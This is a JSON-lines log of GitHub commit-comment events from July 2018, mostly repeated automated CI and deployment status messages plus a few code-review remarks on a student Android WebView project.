{"id":"7957919345","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689111,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-12T18:21:45Z","updated_at":"2018-07-12T18:21:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:21:45Z"}
{"id":"7957920998","type":"CommitCommentEvent","actor":{"login":"nathroy"},"repo":{"name":"XMRWallet/Website"},"payload":{"comment":{"id":29689118,"position":null,"line":null,"path":null,"commit_id":"61e8fe92c21d7116aeb7d5b58313bd75eef4bf0d","created_at":"2018-07-12T18:22:04Z","updated_at":"2018-07-12T18:22:04Z","author_association":"MEMBER","body":"++Added USD Amount for sending"}},"created_at":"2018-07-12T18:22:04Z"}
{"id":"7957921048","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689119,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-12T18:22:05Z","updated_at":"2018-07-12T18:22:05Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:22:05Z"}
{"id":"7957922584","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29689124,"position":null,"line":null,"path":null,"commit_id":"1df935f5bde63ab5acbff2acba52d371550acd8a","created_at":"2018-07-12T18:22:24Z","updated_at":"2018-07-12T18:22:24Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-182223 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-182223\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T18:22:24Z"}
{"id":"7957922629","type":"CommitCommentEvent","actor":{"login":"zhurlik"},"repo":{"name":"Brest-Java-Course-2018/Dmitriy-Shestak"},"payload":{"comment":{"id":29689125,"position":24,"line":32,"path":"camel-integration/src/main/java/com/moro/camel/integration/processor/SoapExecutorProcessor.java","commit_id":"06e6bbc2d1b3a0648a4afd7c871a617ea4f93d54","created_at":"2018-07-12T18:22:24Z","updated_at":"2018-07-12T18:22:24Z","author_association":"NONE","body":"mark as private final \r\nhttps://kinbiko.com/java/dependency-injection-patterns/\r\n"}},"created_at":"2018-07-12T18:22:24Z"}
{"id":"7957923240","type":"CommitCommentEvent","actor":{"login":"Den-JavaAndroid"},"repo":{"name":"Erdemtsynduev/homework-makeYourAppMaterial-androidApp"},"payload":{"comment":{"id":29689126,"position":null,"line":null,"path":null,"commit_id":"6976cdeb6ece56a0e97e99b3b6f186f8ae13b64f","created_at":"2018-07-12T18:22:32Z","updated_at":"2018-07-12T18:22:32Z","author_association":"NONE","body":"Where did you do this promo logo? I want create a similar for my project."}},"created_at":"2018-07-12T18:22:32Z"}
{"id":"7957923467","type":"CommitCommentEvent","actor":{"login":"valtorello"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29689127,"position":null,"line":null,"path":null,"commit_id":"b727a26e1b4b88abe84a8b48208fec537db2ed43","created_at":"2018-07-12T18:22:34Z","updated_at":"2018-07-12T18:22:34Z","author_association":"NONE","body":"When did we create the CustomerController class?  I don't remember going over that or is this something we do on our own for this exercise?"}},"created_at":"2018-07-12T18:22:34Z"}
{"id":"7957924957","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689131,"position":null,"line":null,"path":null,"commit_id":"9ff879811f4c95e4ebf9b965c64288f1d8c62639","created_at":"2018-07-12T18:22:52Z","updated_at":"2018-07-12T18:22:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:22:52Z"}
{"id":"7957925049","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689132,"position":24,"line":20,"path":"webview/app/src/main/java/com/example/simonedigiorgio/webview/second.java","commit_id":"aa3d1b64c8c98bee74eaf58ad8634678f52b31ca","created_at":"2018-07-12T18:22:53Z","updated_at":"2018-07-12T18:22:53Z","author_association":"NONE","body":"\"Url\" should live in a constant so it can be referenced all the time. If you type a wrong letter here or where you put the extra you are going to introduce an error difficult to find out."}},"created_at":"2018-07-12T18:22:53Z"}
{"id":"7957927111","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689135,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-12T18:23:17Z","updated_at":"2018-07-12T18:23:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:23:17Z"}
{"id":"7957927501","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29689138,"position":null,"line":null,"path":null,"commit_id":"a8cddce1ebacac910f0c5a505fc1a5ff8e9f56ea","created_at":"2018-07-12T18:23:21Z","updated_at":"2018-07-12T18:23:21Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |     0.03 |\n| `metadata_passing` |     1    |\n| `nodes_count`      |   688    |\n| `texts_passing`    |     1    |\n| `texts_total`      |     1    |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   +19758 |\n\n## Units\n\n| Changed                                                 | Status   |\n|:--------------------------------------------------------|:---------|\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc2.xml` | New      |\n| `./data/tlg0561/tlg001/__cts__.xml`                     | Passing  |\n| `./data/tlg0561/tlg001/tlg0561.tlg001.perseus-grc2.xml` | Passing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4443)*\n"}},"created_at":"2018-07-12T18:23:21Z"}
{"id":"7957930749","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689141,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-12T18:23:59Z","updated_at":"2018-07-12T18:23:59Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:23:59Z"}
{"id":"7957930997","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689143,"position":27,"line":23,"path":"webview/app/src/main/java/com/example/simonedigiorgio/webview/second.java","commit_id":"aa3d1b64c8c98bee74eaf58ad8634678f52b31ca","created_at":"2018-07-12T18:24:02Z","updated_at":"2018-07-12T18:24:02Z","author_association":"NONE","body":"You should try to understand why instead of just comment it. The reason is probably that the variable browser has not been initialized. Rule #1 read the logcat when the app crashes and fix the problem!"}},"created_at":"2018-07-12T18:24:02Z"}
{"id":"7957933225","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689146,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-12T18:24:28Z","updated_at":"2018-07-12T18:24:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:24:28Z"}
{"id":"7957957214","type":"CommitCommentEvent","actor":{"login":"syntheticfeelings"},"repo":{"name":"syntheticfeelings/HOMEWORK_3_upd"},"payload":{"comment":{"id":29689199,"position":null,"line":null,"path":null,"commit_id":"9eed2da8b063f5212fe543a0c9d28e2abec69abd","created_at":"2018-07-12T18:28:59Z","updated_at":"2018-07-12T18:28:59Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Дз4: User/Student Сапожников](https://trello.com/c/Q5X7ok5L/31-%D0%B4%D0%B74-user-student-%D1%81%D0%B0%D0%BF%D0%BE%D0%B6%D0%BD%D0%B8%D0%BA%D0%BE%D0%B2)"}},"created_at":"2018-07-12T18:28:59Z"}
{"id":"7957958135","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689200,"position":43,"line":41,"path":"webview/app/src/main/java/com/example/simonedigiorgio/webview/MainActivity.java","commit_id":"381fa9a66e5fa8516d1c6ff9a2b14e8d6e495292","created_at":"2018-07-12T18:29:10Z","updated_at":"2018-07-12T18:29:10Z","author_association":"NONE","body":"On Android all the strings used in the UI should go in the resource file string.xml"}},"created_at":"2018-07-12T18:29:10Z"}
{"id":"7957958249","type":"CommitCommentEvent","actor":{"login":"Arcterus"},"repo":{"name":"mesalock-linux/mesabox"},"payload":{"comment":{"id":29689201,"position":null,"line":null,"path":null,"commit_id":"6f7bf02eab5d42c06402f7f8cc55f801d4801eb3","created_at":"2018-07-12T18:29:11Z","updated_at":"2018-07-12T18:29:11Z","author_association":"MEMBER","body":"Relevant issue: #13"}},"created_at":"2018-07-12T18:29:11Z"}
{"id":"7957958408","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689202,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-12T18:29:13Z","updated_at":"2018-07-12T18:29:13Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:29:13Z"}
{"id":"7957959456","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29689205,"position":null,"line":null,"path":null,"commit_id":"307a57afa3f144896c94c99e103dab0f29aba918","created_at":"2018-07-12T18:29:25Z","updated_at":"2018-07-12T18:29:25Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [domainlimi](https://domainlimi-static-docs.pantheonsite.io/docs) Multidev environment:\n- [source/_partials/content/tables/custom-domains-limit.html](https://github.com/pantheon-systems/documentation/commit/307a57afa3f144896c94c99e103dab0f29aba918/source/_partials/content/tables/custom-domains-limit.html)\n"}},"created_at":"2018-07-12T18:29:25Z"}
{"id":"7957960397","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689208,"position":null,"line":null,"path":null,"commit_id":"effbf0cb0bd289925da79124c5b8e778a92736bc","created_at":"2018-07-12T18:29:36Z","updated_at":"2018-07-12T18:29:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:29:36Z"}
{"id":"7957961801","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29689211,"position":null,"line":null,"path":null,"commit_id":"084174d477d76a5bfbebc9ae5662e9bcf6b3eab7","created_at":"2018-07-12T18:29:52Z","updated_at":"2018-07-12T18:29:52Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-182951 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-182951\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T18:29:52Z"}
{"id":"7957962766","type":"CommitCommentEvent","actor":{"login":"ThaTiemsz"},"repo":{"name":"DJScias/Discord-Datamining"},"payload":{"comment":{"id":29689215,"position":null,"line":null,"path":null,"commit_id":"42130f67f4239c970dbc29d90db96d33bf2a8bac","created_at":"2018-07-12T18:30:03Z","updated_at":"2018-07-12T18:30:03Z","author_association":"COLLABORATOR","body":"- Experiment removed: `IOS_CHANGE_LOG: \"2018-4_ios_change_log\"`\r\n\r\n## New string\r\n- ERRORS_RESTART_APP: \"Restart Discord\"`"}},"created_at":"2018-07-12T18:30:03Z"}
{"id":"7957964699","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689222,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-12T18:30:25Z","updated_at":"2018-07-12T18:30:25Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:30:25Z"}
{"id":"7957966034","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29689230,"position":null,"line":null,"path":null,"commit_id":"34b9c120df8b41d18d6732f6acd4d099a4602762","created_at":"2018-07-12T18:30:39Z","updated_at":"2018-07-12T18:30:39Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-12T18:30:39Z"}
{"id":"7957966494","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689234,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-12T18:30:45Z","updated_at":"2018-07-12T18:30:45Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:30:45Z"}
{"id":"7957968289","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29689242,"position":null,"line":null,"path":null,"commit_id":"9841cadf8d72b7ef05e3ad88964e9e165bced00c","created_at":"2018-07-12T18:31:07Z","updated_at":"2018-07-12T18:31:07Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-dshblks2](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-dshblks2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-dshblks2-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-12T18:31:07Z"}
{"id":"7957970739","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689244,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-12T18:31:37Z","updated_at":"2018-07-12T18:31:37Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:31:37Z"}
{"id":"7957971953","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689250,"position":21,"line":24,"path":"webview/app/src/main/java/com/example/simonedigiorgio/webview/MainActivity.java","commit_id":"8c9ef1c395c1590b639a80609536c7236612a345","created_at":"2018-07-12T18:31:51Z","updated_at":"2018-07-12T18:31:51Z","author_association":"NONE","body":"This is probably not compiling since you haven't declared the variable but1. NEVER commit code if it does not compile. This is a simple way to break everything. Plus, don't be afraid to use verbose variables like searchButton instead of but1."}},"created_at":"2018-07-12T18:31:51Z"}
{"id":"7957972182","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689252,"position":null,"line":null,"path":null,"commit_id":"ddd2c913a3df0b153c89c681d4ed9eab38e134f9","created_at":"2018-07-12T18:31:53Z","updated_at":"2018-07-12T18:31:53Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:31:53Z"}
{"id":"7957976990","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689268,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-12T18:32:50Z","updated_at":"2018-07-12T18:32:50Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:32:50Z"}
{"id":"7957977925","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689272,"position":38,"line":35,"path":"webview/app/src/main/java/com/example/simonedigiorgio/webview/MainActivity.java","commit_id":"8c9ef1c395c1590b639a80609536c7236612a345","created_at":"2018-07-12T18:33:01Z","updated_at":"2018-07-12T18:33:01Z","author_association":"NONE","body":"When you write and read the extra you should reference to the same \"key\" variable. E.g.: public static final String EXTRA_URL = \"url\". So, you are error free from typos."}},"created_at":"2018-07-12T18:33:01Z"}
{"id":"7957978057","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29689274,"position":null,"line":null,"path":null,"commit_id":"dc88147961e5f0c2302511d5313ce2f9429843cd","created_at":"2018-07-12T18:33:03Z","updated_at":"2018-07-12T18:33:03Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T18:33:03Z"}
{"id":"7957980879","type":"CommitCommentEvent","actor":{"login":"emanuelconunaemme"},"repo":{"name":"chefleo/Project-Software-Engineering"},"payload":{"comment":{"id":29689281,"position":29,"line":29,"path":"webview/app/src/main/java/com/example/simonedigiorgio/webview/MainActivity.java","commit_id":"8c9ef1c395c1590b639a80609536c7236612a345","created_at":"2018-07-12T18:33:35Z","updated_at":"2018-07-12T18:33:35Z","author_association":"NONE","body":"Good, but we also want to check the url is not empty. So, you can add \"&& url.size() > 0\""}},"created_at":"2018-07-12T18:33:35Z"}
{"id":"7957981563","type":"CommitCommentEvent","actor":{"login":"Memetarif"},"repo":{"name":"Memetarif/testBot"},"payload":{"comment":{"id":29689285,"position":null,"line":null,"path":null,"commit_id":"60fe4e62de4c66fb1915f585f4aba5d7a82437de","created_at":"2018-07-12T18:33:43Z","updated_at":"2018-07-12T18:33:43Z","author_association":"OWNER","body":"Yes"}},"created_at":"2018-07-12T18:33:43Z"}
